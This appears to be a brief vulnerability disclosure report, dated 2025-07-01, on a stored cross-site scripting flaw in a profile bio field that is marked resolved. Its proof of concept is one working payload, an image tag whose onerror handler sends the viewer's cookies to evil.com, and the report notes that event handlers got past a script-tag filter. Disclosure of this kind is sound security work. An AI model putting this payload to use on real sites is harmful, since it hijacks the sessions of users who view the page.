XSS Private Program 2025-07-01
Stored XSS in Profile Bio Field
Severity: High | Status: Resolved
Summary
The profile bio field allowed HTML injection. While <script> was filtered, event handlers like onerror bypassed the filter.
Proof of Concept
<img src=x onerror="fetch('https://evil.com/'+document.cookie)">Impact
Session hijacking of any user viewing the malicious profile.
Responsible Disclosure
This vulnerability was reported responsibly and fixed by the vendor before public disclosure.